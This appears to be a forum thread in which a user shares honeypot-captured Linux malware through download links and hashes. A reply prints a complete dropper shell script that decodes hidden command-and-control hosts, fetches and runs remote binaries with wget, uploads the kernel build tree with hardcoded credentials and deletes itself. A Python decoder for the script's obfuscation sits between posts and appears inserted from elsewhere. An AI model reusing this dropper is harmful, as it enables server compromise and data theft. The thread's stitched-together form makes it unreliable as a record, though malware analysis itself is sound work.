
Posted (edited)

I set up a honeypot and managed to catch a few things. If you have the time and inclination, have a look at them yourselves.

https://mega.co.nz/#F!7pkTXIwA!CEUuPjIZ5tZMEPo6mzbuaw

2789524badd154ba54197b90644bd3fc 3502.rar
a984d8d0a5b39e96beb42ee137736e5c 3502_s.rar
edf1a95c76faa1e304d31ddc633660f8 3503.rar
9dae3c2cd7fd4e8f8215a34302009bd9 java555.rar
aa58641c1f6827c0bc751b948ea85eef java666.rar

3502.rar: POSIX shell script, ASCII text executable
3502_s.rar: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
3503.rar: POSIX shell script, ASCII text executable
java555.rar: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
java666.rar: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped


Edited by hate.me
Posted

@hate.me

Out of curiosity I scanned 2 of the files online:

3502_s.sh

https://www.virustotal.com/en/file/50bf4092721fd8e2127e8602ee83edad37d2ec6650aa4f808792b36a941a79b7/analysis/1415195145/

If I open it with Notepad++ I see a lot of garbage characters that I can't interpret, but some strings are also visible in cleartext:

 %s: cannot create file: %s %s: cannot map file: %s
%s: cannot stat file: %s
%s: file is no correct profile data file for `%s'
Out of memory while initializing profiler
invalid mode for dlopen() cannot extend global scope cannot create scope list no more namespaces available for dlmopen() invalid target namespace in dlmopen() empty dynamic string token substitution opening file=%s [%lu]; direct_opencount=%u


TLS generation counter wrapped! Please report this.
closing file=%s; direct_opencount=%u

file=%s [%lu]; destroying link map
TLS generation counter wrapped! Please report as described in <http://www.gnu.org/software/libc/bugs.html>.

calling fini: %s [%lu]

or

  empty dynamics string token substitution    load auxiliary object=%s requested by file=%s  load filtered object=%s requested by file=%s
cannot allocate dependency list cannot allocate symbol search list Filters not supported with LD_TRACE_PRELINKING
calling init: %s



calling preinit: %s


checking for version `%s' in file %s [%lu] required by file %s [%lu]
no version information available (required by cannot allocate version reference table unsupported version of Verdef record weak version ` ' not found (required by of Verneed record
RTLD_NEXT used in code not dynamically loaded
*** stack smashing detected ***: %s terminated

and the second file, 3503.sh (rar):

#!/bin/sh

__host_32__="sEEA+==deadefadcajc"
__host_64__="sEEA+==deadefadcaih"


__host_32_2__="sEEA+==cbeadgakaddh"
__host_64_2__="sEEA+==cbeadgakaddg"


__host_32_libc__="sEEA+==cbeadgakaddh"
__host_64_libc__="sEEA+==cbeadgakaddg"


__download_url__="sEEA+==deadefadcajd=FAwzlo=egbe"


__remote__="cbeadgakadfg+egbe|cbeadfbacfcagb+egbe|hhacbdadgeaeb+egbe|yoyDaoDludlcazCr+egbe|yoyDaoDludlazCr+egbe|yoyDasnItlzlzanzx+egbe|yoyDaoDludlanzx+egbe"


__username__='loxty'
__password__='admin'


__temp__=/tmp
__install_dir__=/usr/local/bin
__kernel__=`uname -r|awk -F- '{print $1}'`


# select compiler server
server(){
__osv_X86_64=`dec 'Ijh_hf'`
__osv_AMD64=`dec 'LXOhf'`
__os_version_X86_64=`uname -a|grep "$__osv_X86_64"`
__os_version_AMD64=`uname -a|grep "$__osv_AMD64"`
if [ -f /lib/libc.so.6 ]; then
__libc_main=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $1}'`
__libc_sub=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $2}'`
fi


if [ ! -z "$__os_version_X86_64" -o ! -z "$__os_version_AMD64" ] ;then
__online=`wget "$__host_64__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
if [ ! -z "$__online" ]; then #
__host__=$__host_64__
else
__host__=$__host_64_2__
fi


if [ -f /lib/libc.so.6 ]; then
if [ $__libc_main -le 2 ]; then
if [ $__libc_sub -le 5 ]; then
__host__=$__host_64_libc__
fi
fi
fi
else
__online=`wget "$__host_32__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
if [ ! -z "$__online" ]; then #
__host__=$__host_32__
else
__host__=$__host_32_2__
fi


if [ -f /lib/libc.so.6 ]; then
if [ $__libc_main -le 2 ]; then
if [ $__libc_sub -le 5 ]; then
__host__=$__host_32_libc__
fi
fi
fi
fi
}


# check md5
md5(){
__data=`echo "$@"`
echo -n "$__data"|md5sum|cut -d ' ' -f1
return 0
}


# get os version
version(){
if [ -f /sbin/modinfo ]; then
SYS=`/sbin/lsmod |tail -n 1 | awk ' {print $1} '`
echo "`/sbin/modinfo $SYS|grep vermagic|awk -F: '{print $2}'|sed 's/^ *//g'|awk '{print $0}'|sed 's/ /\\\\ /g'`"
fi
return 0
}


checkBuild(){
__build=/lib/modules/`uname -r`/build/
if [ -d $__build ]; then
return 1
fi
return 0
}


# generate header file
generate(){
__files=`ls $__build`
tar zcfhP "$__temp__/dev.tgz" -C $__build $__files
if [ $? -eq 0 ] ;then
return 1
fi
return 0
}


# check header version
check(){
__iid=`echo "$@"`
if [ ! -z "$__iid" ]; then
__result=`wget "$__host__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 3 -O - -q`
if [ ! -z "$__result" ]; then
__code=`echo $__result|awk -F "|" '{print $1}'`
__md5=`echo $__result|awk -F "|" '{print $2}'`
if [ $__code -eq 1001 ]; then
return 1
fi
fi
fi
return 0
}


# download build file
download(){
__iid=`echo "$@"`
if [ ! -z "$__iid" ]; then
__url="$__host__/upload/module/$__iid/build.tgz"
wget "$__url" -O /tmp/build.tgz -q --connect-timeout=3 -t 3
if [ $? -eq 0 ];then #
return 1
fi
fi
return 0
}


download_and_execute(){
wget "$__download_url__" -O /tmp/bin -q --connect-timeout=3 -t 3
if [ $? -eq 0 ];then #
chmod +x /tmp/bin
/tmp/bin
sleep 3
rm -rf /tmp/bin
return 1
fi
return 0
}


# remote compiler code
compiler(){
__iid=`echo "$@"`
if [ ! -z "$__iid" ]; then
__url="$__host__/compiler?iid=$__iid&username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__"
__result=`wget "$__url" -O - -q --connect-timeout=3 -t 3`
if [ ! -z "$__result" ]; then
__code=`echo $__result|awk -F "|" '{print $1}'`
__md5=`echo $__result|awk -F "|" '{print $2}'`
if [ $__code -eq 1001 ]; then
return 1
fi
fi
fi
return 0
}


# uncompress file
uncompress(){
__iid=`echo "$@"`
if [ ! -z "$__iid" ]; then
if [ ! -d $__temp__/$__iid ]; then
mkdir $__temp__/$__iid
fi
tar zxvf $__temp__/build.tgz -C $__temp__/$__iid
if [ $? -eq 0 ] ;then
shred -u -z $__temp__/build.tgz
return 1
fi
fi
return 0
}
enc(){ echo $@|tr "[.0-9a-zA-Z\/\/\:]" "[a-zA-Z0-9\;-=+*\/]"; }
dec(){ echo $@|tr "[a-zA-Z0-9\;-=+*\/]" "[.0-9a-zA-Z\/\/\:]"; }


# install file
setup(){
__iid=`echo "$@"`
if [ ! -z "$__iid" ]; then
__bin=`echo "bin"`
chmod +x $__temp__/$__iid/$__bin
$__temp__/$__iid/$__bin
if [ $? -eq 0 ]; then
sleep 3
rm -rf $__temp__/$__iid/$__bin
return 1
fi
fi
return 0

}




# upload
upload(){
rm -f /tmp/mini
wget $__host__/upload/mini -O /tmp/mini -q --connect-timeout=3 -t 3
if [ $? -eq 0 ];then #
chmod +x /tmp/mini
__url=$__host__/submit
__result=`/tmp/mini --url="$__url" --post="username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__&file=@$__temp__/dev.tgz"`
if [ ! -z "$__result" ]; then
__code=`echo $__result|awk -F "|" '{print $1}'`
__md5=`echo $__result|awk -F "|" '{print $2}'`
if [ $__code -eq 1001 ]; then
rm -f /tmp/mini
return 1
fi
fi
rm -f /tmp/mini
fi
return 0
}






# main entry
main(){
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
__host_32__=`dec "$__host_32__"`
__host_64__=`dec "$__host_64__"`
__host_32_2__=`dec "$__host_32_2__"`
__host_64_2__=`dec "$__host_64_2__"`
__host_32_libc__=`dec "$__host_32_libc__"`
__host_64_libc__=`dec "$__host_64_libc__"`
__download_url__=`dec "$__download_url__"`
__remote__=`dec "$__remote__"`
__username__=`dec "$__username__"`
__version__=`version`
__iid=`md5 "$__version__"`
__iid=`echo $__iid|tr [:lower:] [:upper:]`
__done=0

if [ ! -d /tmp ]; then
mkdir /tmp
fi

if [ -f /usr/bin/wget ]; then
chattr -i /usr/bin/wget
chmod +x /usr/bin/wget
fi

if [ -f /bin/wget ]; then
chattr -i /bin/wget
chmod +x /bin/wget
fi

if [ -f /usr/bin/cut ]; then
chattr -i /usr/bin/cut
chmod +x /usr/bin/cut
fi

if [ -f /bin/cut ]; then
chattr -i /bin/cut
chmod +x /bin/cut
fi

server # select http server
check $__iid
if [ $? -eq 1 ];then
compiler $__iid # remote compiler
if [ $? -eq 1 ]; then
__done=1
fi
else
checkBuild
if [ $? -eq 1 ];then
generate # create header file
if [ $? -eq 1 ]; then
upload
if [ $? -eq 1 ] ;then
__done=1
fi
rm -rf $__temp__/dev.tgz
else
if [ -f $__temp__/dev.tgz ]; then
rm -rf $__temp__/dev.tgz
fi
compiler $__iid # remote compiler
if [ $? -eq 1 ]; then
__done=1
fi
fi
else
compiler $__iid # remote compiler
if [ $? -eq 1 ]; then
__done=1
fi
fi
fi

if [ $__done -eq 1 ]; then
download $__iid
if [ $? -eq 1 ]; then
uncompress $__iid
if [ $? -eq 1 ]; then
setup $__iid
if [ $? -ne 1 ]; then
__done=0
fi
else
__done=0
fi
else
__done=0
fi
fi


if [ $__done -eq 0 ]; then
download_and_execute
fi
rm -rf $__temp__/$__iid
rm -f $0
}


main
ls -la /var/run/sftp.pid
exit $?


Whoever knows how to interpret the code... go for it!
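An added analysis helper, not code from the post above or from the dropper itself: it reimplements the tr-based enc()/dec() mapping the script uses to hide its hosts, so the __host_*__, __download_url__ and __remote__ values can be decoded offline without running anything from the capture. The sample values in the usage line are constructed (RFC 5737 documentation addresses); the only literals taken from the script are the two short strings it decodes itself.

```python
# Reimplementation of the dropper's tr-based enc()/dec() obfuscation.
# Mirrors the GNU tr rules the two one-liners rely on: '\x' escapes to a
# literal x, an unescaped '-' builds a range, a shorter SET2 is padded with
# its last character, and a character repeated in SET1 takes its last mapping.
# The two set specs exactly as the script passes them to tr.
PLAIN = r"[.0-9a-zA-Z\/\/\:]"   # enc() input alphabet, dec() output alphabet
OBFUS = r"[a-zA-Z0-9\;-=+*\/]"  # enc() output alphabet, dec() input alphabet

def expand(spec):
    """Expand a tr set spec into its ordered list of characters."""
    toks, i = [], 0  # (char, escaped) pairs
    while i < len(spec):
        if spec[i] == "\\" and i + 1 < len(spec):
            toks.append((spec[i + 1], True)); i += 2
        else:
            toks.append((spec[i], False)); i += 1
    out, i = [], 0
    while i < len(toks):
        if i + 2 < len(toks) and toks[i + 1] == ("-", False):  # a-z style range
            lo, hi = ord(toks[i][0]), ord(toks[i + 2][0])
            out.extend(map(chr, range(lo, hi + 1))); i += 3
        else:
            out.append(toks[i][0]); i += 1
    return out

def tr(text, set1, set2):
    """Translate text like `tr SET1 SET2`, including GNU's short-SET2 padding."""
    a, b = expand(set1), expand(set2)
    b += [b[-1]] * (len(a) - len(b))  # no-op when SET2 is the longer one
    table = {}
    for x, y in zip(a, b):  # a later duplicate in SET1 overrides the earlier one
        table[x] = y
    return "".join(table.get(ch, ch) for ch in text)

def dec(s):
    """The script's dec(): obfuscated -> plain."""
    return tr(s, OBFUS, PLAIN)

def enc(s):
    """The script's enc(): plain -> obfuscated."""
    return tr(s, PLAIN, OBFUS)

def decode_remote(value):
    """Decode a '|'-separated __remote__-style list into host:port entries."""
    return [dec(item) for item in value.split("|")]

if __name__ == "__main__":
    # Constructed sample (RFC 5737 addresses), not a value from the capture.
    print(decode_remote(enc("198.51.100.7:8080") + "|" + enc("203.0.113.9:8080")))
```

Point dec() at each `__name__="..."` string that main() passes through `dec` to recover the plaintext C2 list for blocking and detection; the script's own `dec 'Ijh_hf'` and `dec 'LXOhf'` calls decode to its uname grep patterns and make a quick sanity check for the mapping.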

Posted

https://mega.co.nz/#!Sl10XY5I!kx8AqbKjY8DB5Vyr0NE0qZDpPWVgp3a40D3xs2Zjp-o

https://mega.co.nz/#!b9VAnCRQ!rwjkhbw76a5hnDwTepkanV0zlidmeNFOF0LoAnfAaQU


txmas: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
txmss: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
ec8ff2f6226f7085059466164f71976c txmas
d26b6ffee5d75b3c63c2e080f4bc735f txmss

